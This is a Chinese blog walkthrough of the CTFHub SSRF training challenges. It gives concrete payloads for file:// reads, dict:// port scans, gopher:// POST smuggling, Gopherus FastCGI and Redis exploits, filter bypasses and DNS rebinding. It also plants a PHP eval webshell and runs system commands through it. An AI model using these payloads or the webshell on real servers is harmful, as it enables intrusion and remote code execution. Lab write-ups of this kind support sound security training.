ctfhub ssrf

于 2024-07-24 21:08:53 发布
阅读量714 收藏 19
点赞数 15
分类专栏: ctfhub ssrf 文章标签: csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhdbk______/article/details/140673288
版权
1.题目:尝试访问位于127.0.1的flag.php

2.输入:http://127.0.0.1/flag.php

第二题:伪协议读取文件

1.题目:尝试去读取一下web目录下的flag.php

2./var/www/html linux系统中的一个目录,用于存放静态网页文件
3.file:///var/www/html/flag.php
4.查看页面源代码

第三题:端口扫描

1.题目:端口范围是8000-9000

2.网页后面输入:?url=dict://127.0.0.1:8080(用http也可以)
3.抓包-->发送到Intruder-->Positions-->Payoads

3.选择端口范围

4.start attack-->等待扫描

5.输入:http://127.0.0.1:端口

第四题:POST请求

1.访问http://127.0.0.1/flag.php

2.找到key

<!-- Debug: key=cea3eccb6c3fede401562a93997d2d97-->

3.抓包并修改

删掉不必要的内容留这些并且host改成127.0.0.1:80

4.url在线编码

5.将%0A替换成%0d%0A(换行符)

6.最后加一个%0d%0A

7.再次编码

8.网址后面加gopher://127.0.0.1:80/_+POST请求包

第五题:上传文件

1.发现没有发送按钮,所以自己编一个<input type="submit" name="submit">

2.抓包和上题一样,只留几行
3.将汉字乱码删除,替换成新的两个汉字,让请求包长度正确可控

4.和上面一样,两次url编码然后输入gopher://127.0.0.1:80/_+POST请求包

第六题:FastCGI协议

1.写一句话木马:PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+

2.kali里面echo 木马
  • echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

  • 在Gopherus数据包中打开终端
  • python2 gopherus.py --exploit fastcgi

  • /var/www/html/index.php
  • echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

3.将白的部分进行url编码

  • 然后直接使用

4.访问shell.php有这个文件

5.caidao-->添加->网址 cmd
  • 在根目录下-->flag

第七题:redis协议

和上题差不多

1.在Gopherus数据包中打开终端
  • python2 gopherus.py --exploit redis
  • PHPShell
  • 因为我们本来就用这个路径所以直接回车
  • <?php @eval($_GET[cmd]);?>

2.url编码粘贴进去转圈但是再输入shell.php没问题

3.ls shell.php?cmd=system('ls /');

4.cat shell.php?cmd=system('cat /flag_1d9b8ddfd9766ee8c6e68b2b7ca0f4fa');

第八题:URL Bypass

1.题目:url中必须包含http//notfound.com

2.输入:?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

实际上还是我们的主机进行访问

第九题:数字IP Bypass

1.题目:这次ban掉了127以及172.不能使用点分十进制的ip了。但是又要访问127.0.1.该怎么办

2.所以我们用localhost/0x7F000001:?url=http://localhost/flag.php

第十题:302跳转 Bypass

1.题目:请求可能会跟随302跳转,尝试利用这个来绕过对ip的检测访

2.输入框输入

第十一题:DNS重绑定

1.概念:

在网页浏览过程中,用户在地址栏中输入包含域名的网址。浏览器通过DNS服务器将域名解析为IP地址,然后向对应的IP地址请求资源,最后展现给用户。而对于域名所有者,他可以设置域名所对应的IP地址。当用户第一次访问,解析域名获取一个IP地址;然后,域名持有者修改对应的IP地址;用户再次请求该域名,就会获取一个新的IP地址。对于浏览器来说,整个过程访问的都是同一域名,所以认为是安全的。(浏览器同源策略) 这就是DNS Rebinding攻击。

2.在这个网站:rbndr.us dns rebinding service

获取7f000001.7f000002.rbndr.us

3.输入:?url=7f000001.7f000002.rbndr.us/flag.php

lhdbk______
关注
  • 15
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1500
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
CTFhub SSRF第一部分
qq_41497476的博客
09-16 787
1.内网访问 提示得很明显 就是要利用ssrf漏洞访问127.0.0.1主机内的flag.php. 在查阅资料的过程中还发现了其他的绕过写法,加上这些特殊符号后对结果无影响 2.伪协议读取文件 强调了Web目录,那明显就是要用到绝对路径,file协议是用绝对路径访问本地文件的协议。 Linux系统下,网站路径是 /var/www/html/… 利用该路径去获得flag文件 看一下对比 file协议是引入绝对路径,但不理解为什么用127.0.0.1直接包含的flag.php跟用file协议绝对路径包
CTFHub SSRF
LYJ20010728的博客
08-10 693
CTFHub SSRFSSRF简介漏洞攻击方式CTFHub SSRF靶场第一部分(Http、Dict和file等协议的利用)内网访问伪协议读取文件端口扫描 SSRF简介 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统,也就是说可以利用一个网络请求的服务,当作跳板进行攻击
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1396
ctfhub ssrf post小记
CTFHUB SSRF
CN天狼
02-14 1249
CTFHUB SSRF post 上传文件 fastcgi Redis协议 URL Bypass 数字IP Bypass 302跳转 Bypass DNS重绑定 Bypass
CTFHub SSRF总结
iO快到碗里来
08-25 2120
内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 进入题目: 可以看到该链接可以传入一个参数url=,跟据题目描述直接构造payload:url=http://127.0.0.1/flag.php,成功得到flag。 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 进入题目: 和第一题一样,可以传入一个参数url=,首先尝试第一题的payload:url=http://127.0.0.1/flag.php 蟹bro,What’s up ??? F12看
CTFHUB SSRF 【全】
Jay17的博客
04-17 1326
CTFHUB SSRF 题解 【全】
CTFhub ssrf 端口扫描&文件上传
m0_64815693的博客
09-02 2339
CTFhub ssrf 端口扫描&文件上传
CTFHub SSRF Redis协议 WriteUp
柠檬i的博客
12-31 495
SSRF+Redis组合拳绝对路径写webshell
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 522
CTFHUBssrf中文件上传的题目内容,记录自己遇到的问题
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
CSRF(Cross-site request forgery)
fencecat的博客
07-20 762
CSRF是一个web安全漏洞,该漏洞通过引诱用户来执行非预期的操作。该漏洞使得攻击者能够绕过同源策略,同源策略是一种用来阻止不同网站相互干扰的一种技术。 CSR跨站请求伪造,攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。在CSRF攻击场景中,攻击者会伪造一个请求(一般为链接),然后欺骗用户进行点击,用户一旦点击,整个攻击也就完成了。所以CSRF攻击也被称为”one click"攻击。
CSRF+XSS组合攻击实战
记录学习
07-19 1353
xss和csrf组合攻击漏洞复现
CSRF防御及模拟CSRF攻击
qq_37550440的博客
07-19 1017
防御csrf攻击方式 CSRF Token则是为了防止跨站请求伪造攻击而设计的。在CSRF攻击中,攻击者试图诱使已登录的用户在不知情的情况下执行恶意操作,例如转账或改变账户设置。CSRF Token是一种额外的安全措施,用来确认发起请求的页面是可信任的源。
pikachu 之CSRF(跨站请求伪造)get和post型
最新发布
LIU6636LIU的博客
07-23 547
pikachu 之CSRF(跨站请求伪造)get和post型
CTFHub ssrf
07-29
所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值